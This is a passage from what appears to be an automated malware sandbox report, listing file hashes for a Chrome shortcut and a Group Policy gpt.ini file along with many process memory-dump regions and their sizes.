edf5468f019dfc5d74c6f66ed0c41708d955d362

SHA256
29e51683b83f237f1c972b3e5be2f47498a2e70f42e35d7c8e416063d4e554d4

SHA512
12c5af701a34365ebefeecbab56c6f08a4b12a30bf9f31526d6db88a2cdb34ea7dbb16cd50ccd6d0cf0a52d4ac430d2019f50fadf059c78d2fddaabda7791ff7

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
5444447089f616f1761c7cbc41a59278

SHA1
66ecbddba6c083bb591087ebfb61d165660809e8

SHA256
789ae5276ed5ec1bf32d6a015da56b182ecc0347737d7639ecff0c588a39fcaf

SHA512
d6875556ca71e307cc32c708d71a5f949e6c577ff486a16fe344897f557f01a90bdd78ae4eb527c4307bfb6629c1add67b49b0de5603bf7943b1b38640f7fc7b

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
memory/712-501-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1472-191-0x0000000002E20000-0x0000000002F20000-memory.dmp

Filesize
1024KB

Download
memory/1472-244-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1472-271-0x0000000000400000-0x0000000002D2E000-memory.dmp

Filesize
41.2MB

Download
memory/1472-194-0x0000000004A30000-0x0000000004A57000-memory.dmp

Filesize
156KB

Download
memory/1472-208-0x0000000000400000-0x0000000002D2E000-memory.dmp

Filesize
41.2MB

Download
memory/1524-65-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/1524-52-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/1524-51-0x0000000000C70000-0x0000000000C80000-memory.dmp

Filesize
64KB

Download
memory/1548-254-0x0000000000B60000-0x0000000000B61000-memory.dmp

Filesize
4KB

Download
memory/1548-303-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1548-475-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1548-681-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1560-161-0x00000000083C0000-0x0000000008966000-memory.dmp

Filesize
5.6MB

Download
memory/1560-112-0x0000000005DF0000-0x0000000005E02000-memory.dmp

Filesize
72KB

Download
memory/1560-220-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/1560-61-0x00000000014D0000-0x00000000014F2000-memory.dmp

Filesize
136KB

Download
memory/1560-69-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/1560-145-0x00000000078E0000-0x0000000007E0C000-memory.dmp

Filesize
5.2MB

Download
memory/1560-144-0x00000000071E0000-0x00000000073A2000-memory.dmp

Filesize
1.8MB

Download
memory/1560-130-0x0000000006E90000-0x0000000006ECC000-memory.dmp

Filesize
240KB

Download
memory/1560-73-0x0000000005890000-0x00000000058F6000-memory.dmp

Filesize
408KB

Download
memory/1560-123-0x0000000005940000-0x0000000005950000-memory.dmp

Filesize
64KB

Download
memory/1560-113-0x0000000005F20000-0x000000000602A000-memory.dmp

Filesize
1.0MB

Download
memory/1560-164-0x00000000075C0000-0x0000000007652000-memory.dmp

Filesize
584KB

Download
memory/1560-103-0x0000000006370000-0x0000000006988000-memory.dmp

Filesize
6.1MB

Download
memory/1584-17-0x00000000003E0000-0x0000000000CCE000-memory.dmp

Filesize
8.9MB

Download
memory/1584-14-0x00000000003E0000-0x0000000000CCE000-memory.dmp

Filesize
8.9MB

Download
memory/1584-15-0x00000000003E0000-0x0000000000CCE000-memory.dmp

Filesize
8.9MB

Download
memory/1584-13-0x00000000012E0000-0x00000000012E1000-memory.dmp

Filesize
4KB

Download
memory/1676-302-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/1676-251-0x0000000003060000-0x0000000003160000-memory.dmp

Filesize
1024KB

Download
memory/1676-236-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/1768-238-0x00007FF9929D0000-0x00007FF993492000-memory.dmp

Filesize
10.8MB

Download
memory/1768-207-0x0000000000EC0000-0x0000000000F0A000-memory.dmp

Filesize
296KB

Download
memory/1768-240-0x000000001BDA0000-0x000000001BDB0000-memory.dmp

Filesize
64KB

Download
memory/2336-525-0x0000000002D60000-0x0000000002D61000-memory.dmp

Filesize
4KB

Download
memory/2336-528-0x0000000002D80000-0x0000000002D81000-memory.dmp

Filesize
4KB

Download
memory/2336-527-0x0000000002D70000-0x0000000002D71000-memory.dmp

Filesize
4KB

Download
memory/2336-522-0x0000000001260000-0x0000000001261000-memory.dmp

Filesize
4KB

Download
memory/2336-523-0x0000000002D50000-0x0000000002D51000-memory.dmp

Filesize
4KB

Download
memory/2336-519-0x0000000001200000-0x0000000001201000-memory.dmp

Filesize
4KB

Download
memory/2336-518-0x00000000011F0000-0x00000000011F1000-memory.dmp

Filesize
4KB

Download
memory/2532-50-0x0000000003B70000-0x0000000003B74000-memory.dmp

Filesize
16KB

Download
memory/2688-422-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/2832-590-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/2876-335-0x00007FF9929D0000-0x00007FF993492000-memory.dmp

Filesize
10.8MB

Download
memory/2876-329-0x0000000000080000-0x0000000000096000-memory.dmp

Filesize
88KB

Download
memory/3368-169-0x0000000006FB0000-0x0000000006FCA000-memory.dmp

Filesize
104KB

Download
memory/3368-82-0x0000000004FF0000-0x000000000561A000-memory.dmp

Filesize
6.2MB

Download
memory/3368-334-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/3368-77-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/3368-79-0x0000000000E00000-0x0000000000E36000-memory.dmp

Filesize
216KB

Download
memory/3368-78-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/3368-80-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/3368-89-0x0000000004F80000-0x0000000004FA2000-memory.dmp

Filesize
136KB

Download
memory/3368-245-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/3368-91-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/3368-114-0x0000000005770000-0x0000000005AC7000-memory.dmp

Filesize
3.3MB

Download
memory/3368-126-0x0000000004AF0000-0x0000000004B0E000-memory.dmp

Filesize
120KB

Download
memory/3368-206-0x00000000071C0000-0x00000000071D1000-memory.dmp

Filesize
68KB

Download
memory/3368-192-0x0000000007220000-0x00000000072B6000-memory.dmp

Filesize
600KB

Download
memory/3368-181-0x0000000007010000-0x000000000701A000-memory.dmp

Filesize
40KB

Download
memory/3368-128-0x00000000061B0000-0x00000000061FC000-memory.dmp

Filesize
304KB

Download
memory/3368-167-0x0000000007630000-0x0000000007CAA000-memory.dmp

Filesize
6.5MB

Download
memory/3368-159-0x0000000006E60000-0x0000000006F04000-memory.dmp

Filesize
656KB

Download
memory/3368-157-0x0000000006E40000-0x0000000006E5E000-memory.dmp

Filesize
120KB

Download
memory/3368-148-0x000000006FED0000-0x000000006FF1C000-memory.dmp

Filesize
304KB

Download
memory/3368-146-0x000000007F740000-0x000000007F750000-memory.dmp

Filesize
64KB

Download
memory/3368-147-0x0000000006C00000-0x0000000006C34000-memory.dmp

Filesize
208KB

Download
memory/3368-143-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/3480-127-0x0000000004A70000-0x0000000004ADC000-memory.dmp

Filesize
432KB

Download
memory/3480-125-0x0000000002E50000-0x0000000002F50000-memory.dmp

Filesize
1024KB

Download
memory/3480-239-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/3480-129-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/3548-0-0x0000000000E20000-0x0000000000E28000-memory.dmp

Filesize
32KB

Download
memory/3548-1-0x00007FF9929D0000-0x00007FF993492000-memory.dmp

Filesize
10.8MB

Download
memory/3548-2-0x000000001BA30000-0x000000001BA40000-memory.dmp

Filesize
64KB

Download
memory/3548-3-0x00007FF9929D0000-0x00007FF993492000-memory.dmp

Filesize
10.8MB

Download
memory/3548-4-0x000000001BA30000-0x000000001BA40000-memory.dmp

Filesize
64KB

Download
memory/3652-218-0x00007FF677380000-0x00007FF6775D4000-memory.dmp

Filesize
2.3MB

Download
memory/4044-367-0x0000000000440000-0x0000000000440000-memory.dmp

Download
memory/4044-324-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4820-373-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4920-333-0x0000000073E70000-0x0000000074621000-memory.dmp

Filesize
7.7MB

Download
memory/4920-325-0x0000000000350000-0x00000000003CC000-memory.dmp

Filesize
496KB

Download
memory/4932-676-0x0000000000400000-0x0000000002D2E000-memory.dmp

Filesize
41.2MB

Download
memory/5040-249-0x00007FF9929D0000-0x00007FF993492000-memory.dmp

Filesize
10.8MB

Download
memory/5040-231-0x00000000002B0000-0x00000000002C6000-memory.dmp

Filesize
88KB

Download